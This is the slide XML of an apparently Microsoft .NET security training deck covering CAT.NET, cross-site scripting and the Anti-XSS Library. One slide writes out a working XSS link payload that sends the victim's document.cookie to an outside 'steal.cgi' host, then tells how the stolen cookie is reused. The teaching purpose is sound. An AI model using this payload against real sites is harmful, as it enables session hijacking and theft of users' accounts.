        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265923" y="1285744"/>
            <a:ext cx="8560837" cy="6149376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CAT.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a static code analysis tool like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fxCop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> but specially built for managed code and with a strong focus on security vulnerabilities. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CAT.NET scans manage code for specific security vulnerabilities like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> SQL injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LDAP injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross Site Scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XPATH injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and many other categories of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnarabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1"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CAT.NET demo</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="510978" name="Picture 2" descr="http://blogs.msdn.com/blogfiles/syedab/WindowsLiveWriter/HowtoUseCAT.NET1.1asaVisualstudioAddIn_E858/CATNETExcelReport_2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="230097" y="895738"/>
            <a:ext cx="8913903" cy="5738327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1064744"/>
            <a:ext cx="8915400" cy="5096780"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>XSS stands for Cross Site Scripting, an XSS attack is when an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>attacker manages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>to inject Java script code or sometimes other code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>usually Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Script) into a website causing it to execute the code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>if an attacker made a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>specially crafted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>link and sent it to an unsuspecting victim and that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>victim clicked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>the link and a piece of Java Script code could be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>executed which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>would send the victims cookie away to a CGI Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting carried out on websites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" u="sng" dirty="0" smtClean="0"/>
              <a:t>were roughly 80% of all documented security vulnerabilities as of 2007</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" sz="3000" u="sng"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XSS Attack !</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="858416"/>
            <a:ext cx="8915400" cy="6244904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>victim and email, with the following HTML:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-US" sz="2400" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;AHREF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=&lt;script&gt;document.location.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>('http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>freewebhost.com/ph33r/steal.cg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?'+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;"&gt;Check this Article Out! &lt;/a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
                <a:cs typeface="Shonar Bangla" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>user would of course click the link and they would be lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>the CNN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>News Article, but at the same time the attacker would of been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>also direct the user towards his specially crafted URL, he now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2800" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2800" dirty="0"/>
              <a:t> cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Using the Firefox cookie editor the attacker copies and pastes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>the victims </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>cookie and uses it for himself.</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" sz="3000" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="507906" name="Picture 2">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="196900" y="933061"/>
            <a:ext cx="8947100" cy="5924939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>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07906"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5079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7000" y="127000"/>
            <a:ext cx="8870950" cy="1311128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Microsoft Anti-Cross Site Scripting Library V3.0</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="8915400" cy="5004447"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Microsoft Anti-Cross Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It differs from most encoding libraries in that it uses the white-listing technique -- sometimes referred to as the principle of inclusions -- to provide protection against XSS attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>http://www.microsoft.com/downloads/details.aspx?familyid=051EE83C-5CCF-48ED-8463-02F56A6BFC09&amp;displaylang=en</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" sz="2400"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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Session Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="8915400" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>.NET Framework Security Features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Code Access Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Role-Based Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Securing ASP.NET Web Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Securing ASP.NET Web Services</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6" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Next Steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1074738"/>
            <a:ext cx="9285288" cy="3971925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Stay informed about security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1100138" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Sign up for security bulletins:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1100138" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/security/security_bulletins/alerts2.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1100138" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Get the latest Microsoft security guidance:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1100138" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/security/guidance/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Get additional security training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1100138" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Find online and in-person training seminars:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1100138" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/seminar/events/security.mspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1100138" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Find a local CTEC for hands-on training:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1100138" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/learning/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For More Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="8915400" cy="3236913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Microsoft Security Site (all audiences)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>MSDN Security Site (developers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://msdn.microsoft.com/security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>TechNet Security Site (IT professionals)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/technet/security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>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r>
              <a:rPr lang="en-US"/>
              <a:t>Questions and Answers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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Strong-Named Assemblies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="939800"/>
            <a:ext cx="8915400" cy="5230813"/>
          </a:xfrm>
          <a:noFill/>
